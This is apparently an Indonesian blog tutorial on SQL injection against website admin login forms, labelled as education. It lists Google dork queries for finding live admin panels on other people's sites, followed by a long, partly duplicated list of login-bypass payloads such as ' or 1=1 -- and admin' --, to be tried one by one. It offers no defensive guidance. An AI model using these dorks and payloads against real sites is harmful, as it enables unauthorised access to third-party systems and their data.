[caption caption="sql injection - http://www.marcofolio.net/"][/caption]
SQL Injection adalah salah satu teknik exploit dengan memanfaatkan kelemahan pada database. Pada umumnya ini di inject ( suntik) kedalam form yang membutuhkan input dari user, misalnya buku tamu, komentar, login user , login admin dll.
Kali ini saya akan membagi pengetahuan untuk melakukan injection ke login admin, saya tulis disini sebagai pembelajaran saja agar rekan rekan lebih aware ke keamanan databasenya. Segala resiko tanggung jawab sendiri ya, sekali lagi saya hanya menyajikan dalam kerangka edukasi.
Saya gunakan teknik yang paling sederhana yaitu menggunakan Google Dork di Google Hacking Database, untuk menemukan sasaran yang vulnerable.
Okay.. google dork yang kita akan pakai ada beberapa antara lain , cobain sendiri ya :
- nurl:manager intitle:Admin Panel
- inurl:/admin2/ ext:php inurk:/admin/ ext:php
- inurl:/adminpanel/ ext:php
- inurl:/admin_panel/
- inurl:/login.php
- inurl:/admin.php
- inurl:/admin
- inurl:/login.html
Hasilnya kira kira akan nada list seperti dibawah ini :
Demikian hasil dari Google Dork tersebut, tapi apakah semua vulnerable ? belum tentu , di step ini kita harus satu persatu mencoba dengan memasukkan SQL Injection nya.
Nah kita asumsikan sudah mendapatkan admin login , maka kita tinggal coba memasukkan kombinasi rangkaian user dan password sebagai injection nya.
User Name :Â
- ' or 1=1 limit 1 -- -+
- "' OR 1=1 "
- admin
Password :
- ' or 1=1 limit 1 -- -+
- or ‘1’=’1
- ' or '1'='1
- ' or 'x'='x
- ' or 0=0 --
- " or 0=0 --
- or 0=0 --
- ' or 0=0 #
- " or 0=0 #
- or 0=0 #
- ' or 'x'='x
- " or "x"="x
- ') or ('x'='x
- ' or 1=1--
- " or 1=1--
- or 1=1--
- ' or a=a--
- " or "a"="a
- ') or ('a'='a
- ") or ("a"="a
- hi" or "a"="a
- hi" or 1=1 --
- hi' or 1=1 --
- 'or'1=1'
- ==
- and 1=1--
- and 1=1
- ' or 'one'='one--
- ' or 'one'='one
- ' and 'one'='one
- ' and 'one'='one--
- 1') and '1'='1--
- admin' --
- admin' #
- admin'/*
- or 1=1--
- or 1=1#
- or 1=1/*
- ) or '1'='1--
- ) or ('1'='1--
- ' or '1'='1
- ' or 'x'='x
- ' or 0=0 --
- " or 0=0 --
- or 0=0 --
- ' or 0=0 #
- " or 0=0 #
- or 0=0 #
- ' or 'x'='x
- " or "x"="x
- ') or ('x'='x
- ' or 1=1--
- " or 1=1--
- or 1=1--
- ' or a=a--
- " or "a"="a
- ') or ('a'='a
- ") or ("a"="a
- hi" or "a"="a
- hi" or 1=1 --
- hi' or 1=1 --
- 'or'1=1'
